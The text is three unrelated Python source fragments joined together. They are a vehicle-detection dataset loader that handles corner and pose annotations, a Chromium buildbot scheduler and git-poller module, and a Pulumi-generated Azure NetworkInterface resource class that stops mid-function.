return data
def prepare_train_img(self, idx):
img_info = self.get_img_info(idx)
# load image
img = mmcv.imread(osp.join(self.img_prefix, img_info['filename']))
ann = self.get_ann_info(idx)
gt_corners = ann['corners']
gt_classes = ann['classes']
gt_poses = ann['poses']
# class-id with negtive number are encoded as ignored
if not self.with_ignore:
idx = np.where(gt_classes > 0)[0]
gt_corners = gt_corners[idx]
gt_classes = gt_classes[idx]
gt_poses = gt_poses[idx]
if len(gt_corners) == 0:
return None
## ensure the corner order.
## bi-sideview:
## c0 -- c1 -- c2
## | | |
## c3 -- c4 -- c5
## single-sideview
## c0 -- - -- c2
## | | |
## c3 -- - -- c5
try:
assert (gt_corners[:, 0, 0] < gt_corners[:, 2, 0]).all()
except:
print(gt_corners.shape)
assert (gt_corners[:, 0, 1] < gt_corners[:, 3, 1]).all()
assert (gt_corners[:, 5, 0] > gt_corners[:, 3, 0]).all()
assert (gt_corners[:, 5, 1] > gt_corners[:, 2, 1]).all()
# extra augmentation
if self.extra_aug is not None:
labels = np.stack([gt_classes, gt_poses], axis=1)
img, gt_corners, labels = self.extra_aug(img, gt_corners, labels)
gt_classes, gt_poses = np.split(labels, 2, axis=1)
gt_classes = gt_classes.reshape(-1)
gt_poses = gt_poses.reshape(-1)
# apply transforms
flip = True if np.random.rand() < self.flip_ratio else False
# randomly sample a scale
img_scale = random_scale(self.img_scales, self.multiscale_mode)
img, img_shape, pad_shape, scale_factor = self.img_transform(
img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
img = img.copy()
gt_corners, gt_poses = self.point_transform(gt_corners, gt_poses,
img_shape,
scale_factor[:2], flip)
ori_shape = (img_info['height'], img_info['width'], 3)
# vimg = img * np.array(
# self.img_norm_cfg['mean'],
# dtype=np.float32).reshape(3, 1, 1) + np.array(
# self.img_norm_cfg['std'], dtype=np.float32).reshape(3, 1, 1)
# show_train_img(vimg.astype(np.uint8), gt_corners, gt_poses)
img_meta = dict(
ori_shape=ori_shape,
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
data = dict(
img=DC(to_tensor(img), stack=True),
img_meta=DC(img_meta, cpu_only=True),
gt_corners=DC(to_tensor(gt_corners)),
gt_classes=DC(to_tensor(gt_classes)),
gt_poses=DC(to_tensor(gt_poses)),
)
return data
def prepare_test_img(self, idx):
"""Prepare an image for testing (multi-scale and flipping)"""
img_info = self.get_img_info(idx)
img = mmcv.imread(osp.join(self.img_prefix, img_info['filename']))
def prepare_single(img, scale, flip):
_img, img_shape, pad_shape, scale_factor = self.img_transform(
img, scale, flip, keep_ratio=self.resize_keep_ratio)
_img = to_tensor(_img)
_img_meta = dict(
ori_shape=(img_info['height'], img_info['width'], 3),
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
return _img, _img_meta
imgs = []
img_metas = []
for scale in self.img_scales:
_img, _img_meta = prepare_single(img, scale, False)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
if self.flip_ratio > 0:
_img, _img_meta = prepare_single(img, scale, True)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
data = dict(img=imgs, img_meta=img_metas)
return data
def show_train_img(img, gt_corners, gt_poses):
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
pose2sides = {
0: [('tail', 'outer')],
1: [('left', 'left'), ('tail', 'right')],
2: [('left', 'outer')],
3: [('head', 'left'), ('left', 'right')],
4: [('head', 'outer')],
5: [('right', 'left'), ('head', 'right')],
6: [('right', 'outer')],
7: [('tail', 'left'), ('right', 'right')],
}
side2color = {
'left': 'yellow',
'head': 'red',
'right': 'gold',
'tail': 'green',
}
side2idx = {
'left': [0, 1, 4, 3],
'right': [1, 2, 5, 4],
'outer': [0, 2, 5, 3],
}
plt.figure(figsize=(30, 48))
ax = plt.gca()
for i in range(len(gt_poses)):
if gt_poses[i] < 0:
side_list = [('tail', 'outer')]
else:
side_list = pose2sides[gt_poses[i]]
for s, v in side_list:
color = side2color[s]
vcorners = gt_corners[i, side2idx[v], :]
ax.add_patch((Polygon(vcorners, alpha=0.5, facecolor=color)))
if img.shape[2] == 3:
plt.imshow(img[..., [2, 1, 0]])
else:
plt.imshow(img.transpose([1, 2, 0]))
plt.show()
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
from buildbot.changes.filter import ChangeFilter
from buildbot.changes.gitpoller import GitPoller
from buildbot.process.properties import Properties
from buildbot.schedulers.basic import SingleBranchScheduler, AnyBranchScheduler
from twisted.internet import defer, utils
from twisted.python import log
class FilterNewSpecProvider(object):
"""Class that implements ChangeFilter generation for CrOS instruction commits.
CrOS sends builder triggers to BuildBot by committing changes with a specific
commit message format. Builders that want to trigger on that message will
use the ChangeFilter returned by this class in their Schedulers.
"""
# Regex to identify and parse branch-launching commit messages. The first
# group is the launching builder name, and the second is its branch.
_CHANGE_FILTER_RE = re.compile(r'Automatic:\s+Start\s+([^\s]+)\s+([^\s]+)')
# Regular expression type.
_REGEX_TYPE = type(re.compile(''))
def __init__(self, repo, builder, branch=None):
"""Creates a new FilterNewSpecProvider.
Args:
repo: The repository to watch.
builder (str/regex): The name of the cbuildbot config to watch.
branch (str/regex): The branch that the specified builder is building on.
If None, use 'master'.
"""
self._repo = repo
self._builder = self._ToRegex(builder)
self._branch = self._ToRegex(branch or 'master')
@classmethod
def _ToRegex(cls, value):
"""Converts 'value' to a regex if it's a string; else returns 'value'."""
if isinstance(value, basestring):
value = re.compile(r'^\b%s\b$' % (value,))
assert isinstance(value, cls._REGEX_TYPE)
return value
def _CheckCommitLines(self, *lines):
"""Checks if a given set of commit message lines matches the filter spec."""
for line in lines:
match = self._CHANGE_FILTER_RE.match(line)
if match:
matchBuilder, matchBranch = match.group(1), match.group(2)
break
else:
return False
# Do our builder and branch regex match?
return (
self._builder.match(matchBuilder) is not None and
self._branch.match(matchBranch) is not None)
def GetChangeFilter(self):
"""Returns (ChangeFilter): A BuildBot ChangeFilter for matching changes."""
return ChangeFilter(
lambda change: self._CheckCommitLines(*change.comments.splitlines()),
repository=self._repo)
# Function that returns a ChangeFilter from a FilterNewSpecProvider.
FilterNewSpec = lambda *args, **kwargs: \
FilterNewSpecProvider(*args, **kwargs).GetChangeFilter()
class _AddBuildIdMixin(object):
"""MixIn that adds 'the _addBuildIdProperty' function to a class."""
BUILD_ID_RE = re.compile(r'CrOS-Build-Id: (.+)')
@staticmethod
def _cleanMasterBuildId(value):
try:
return int(value.strip())
except ValueError, e:
log.msg("Identified invalid build ID [%s]: %s" % (value, e))
return None
@classmethod
def _getMasterBuildId(cls, change):
for line in change.get('comments', '').splitlines():
match = cls.BUILD_ID_RE.match(line)
if match:
return cls._cleanMasterBuildId(match.group(1))
return None
@defer.inlineCallbacks
def _addBuildIdProperty(self, changeids, properties=None):
"""Adds the 'master_build_id' property if specified in the change log."""
if not properties:
properties = Properties()
if len(changeids) == 1:
change = yield self.master.db.changes.getChange(changeids[0])
master_build_id = self._getMasterBuildId(change)
if master_build_id:
properties.setProperty('master_build_id', master_build_id,
'Scheduler')
defer.returnValue(properties)
class ChromeOSManifestSingleBranchScheduler(SingleBranchScheduler,
_AddBuildIdMixin):
"""Augmented 'SingleBranchScheduler' that recognizes CROS build properties"""
# Overrides 'SingleBranchScheduler.addBuildsetForChanges'
@defer.inlineCallbacks
def addBuildsetForChanges(self, *args, **kwargs):
kwargs['properties'] = yield self._addBuildIdProperty(
kwargs.get('changeids', ()),
kwargs.get('properties'),
)
rv = yield SingleBranchScheduler.addBuildsetForChanges(
self,
*args,
**kwargs)
defer.returnValue(rv)
class ChromeOSManifestAnyBranchScheduler(AnyBranchScheduler, _AddBuildIdMixin):
"""Augmented 'AnyBranchScheduler' that recognizes CROS build properties"""
# Overrides 'AnyBranchScheduler.addBuildsetForChanges'
@defer.inlineCallbacks
def addBuildsetForChanges(self, *args, **kwargs):
kwargs['properties'] = yield self._addBuildIdProperty(
kwargs.get('changeids', ()),
kwargs.get('properties'),
)
rv = yield AnyBranchScheduler.addBuildsetForChanges(
self,
*args,
**kwargs)
defer.returnValue(rv)
class CommentRespectingGitPoller(GitPoller):
"""A subclass of the BuildBot GitPoller that doesn't wreck comment newlines.
"""
# Overrides 'buildbot.changes.gitpoller._get_commit_comments'
def _get_commit_comments(self, rev):
args = ['log', rev, '--no-walk', r'--format=%B%n']
d = utils.getProcessOutput(self.gitbin, args, path=self.workdir,
env=os.environ, errortoo=False)
def process(git_output):
stripped_output = git_output.strip().decode(self.encoding)
if len(stripped_output) == 0:
raise EnvironmentError('could not get commit comment for rev')
return stripped_output
d.addCallback(process)
return d
|
<reponame>henriktao/pulumi-azure
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkInterfaceArgs', 'NetworkInterface']
@pulumi.input_type
class NetworkInterfaceArgs:
def __init__(__self__, *,
ip_configurations: pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]],
resource_group_name: pulumi.Input[str],
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a NetworkInterface resource.
:param pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "ip_configurations", ip_configurations)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if enable_ip_forwarding is not None:
pulumi.set(__self__, "enable_ip_forwarding", enable_ip_forwarding)
if internal_dns_name_label is not None:
pulumi.set(__self__, "internal_dns_name_label", internal_dns_name_label)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@enable_ip_forwarding.setter
def enable_ip_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ip_forwarding", value)
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> Optional[pulumi.Input[str]]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@internal_dns_name_label.setter
def internal_dns_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_dns_name_label", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _NetworkInterfaceState:
def __init__(__self__, *,
applied_dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
internal_domain_name_suffix: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NetworkInterface resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] applied_dns_servers: If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] internal_domain_name_suffix: Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] mac_address: The Media Access Control (MAC) Address of the Network Interface.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] private_ip_address: The Static IP Address which should be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_ip_addresses: The private IP addresses of the network interface.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine which this Network Interface is connected to.
"""
if applied_dns_servers is not None:
pulumi.set(__self__, "applied_dns_servers", applied_dns_servers)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if enable_ip_forwarding is not None:
pulumi.set(__self__, "enable_ip_forwarding", enable_ip_forwarding)
if internal_dns_name_label is not None:
pulumi.set(__self__, "internal_dns_name_label", internal_dns_name_label)
if internal_domain_name_suffix is not None:
pulumi.set(__self__, "internal_domain_name_suffix", internal_domain_name_suffix)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_addresses is not None:
pulumi.set(__self__, "private_ip_addresses", private_ip_addresses)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_machine_id is not None:
pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)
@property
@pulumi.getter(name="appliedDnsServers")
def applied_dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
"""
return pulumi.get(self, "applied_dns_servers")
@applied_dns_servers.setter
def applied_dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "applied_dns_servers", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@enable_ip_forwarding.setter
def enable_ip_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ip_forwarding", value)
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> Optional[pulumi.Input[str]]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@internal_dns_name_label.setter
def internal_dns_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_dns_name_label", value)
@property
@pulumi.getter(name="internalDomainNameSuffix")
def internal_domain_name_suffix(self) -> Optional[pulumi.Input[str]]:
"""
Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
"""
return pulumi.get(self, "internal_domain_name_suffix")
@internal_domain_name_suffix.setter
def internal_domain_name_suffix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_domain_name_suffix", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[pulumi.Input[str]]:
"""
The Media Access Control (MAC) Address of the Network Interface.
"""
return pulumi.get(self, "mac_address")
@mac_address.setter
def mac_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mac_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The Static IP Address which should be used.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAddresses")
def private_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The private IP addresses of the network interface.
"""
return pulumi.get(self, "private_ip_addresses")
@private_ip_addresses.setter
def private_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_ip_addresses", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Machine which this Network Interface is connected to.
"""
return pulumi.get(self, "virtual_machine_id")
@virtual_machine_id.setter
def virtual_machine_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_machine_id", value)
class NetworkInterface(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Network Interface.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["10.0.0.0/16"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_network_interface = azure.network.NetworkInterface("exampleNetworkInterface",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configurations=[azure.network.NetworkInterfaceIpConfigurationArgs(
name="internal",
subnet_id=example_subnet.id,
private_ip_address_allocation="Dynamic",
)])
```
## Import
Network Interfaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkInterface:NetworkInterface example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkInterfaces/nic1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkInterfaceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Network Interface.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["10.0.0.0/16"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_network_interface = azure.network.NetworkInterface("exampleNetworkInterface",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configurations=[azure.network.NetworkInterfaceIpConfigurationArgs(
name="internal",
subnet_id=example_subnet.id,
private_ip_address_allocation="Dynamic",
)])
```
## Import
Network Interfaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkInterface:NetworkInterface example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkInterfaces/nic1
```
:param str resource_name: The name of the resource.
:param NetworkInterfaceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkInterfaceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NetworkInterfaceArgs.__new__(NetworkInterfaceArgs)
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["enable_accelerated_networking"] = enable_accelerated_networking
__props__.__dict__["enable_ip_forwarding"] = enable_ip_forwarding
__props__.__dict__["internal_dns_name_label"] = internal_dns_name_label
if ip_configurations is None and not opts.urn:
raise TypeError("Missing required property 'ip_configurations'")
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
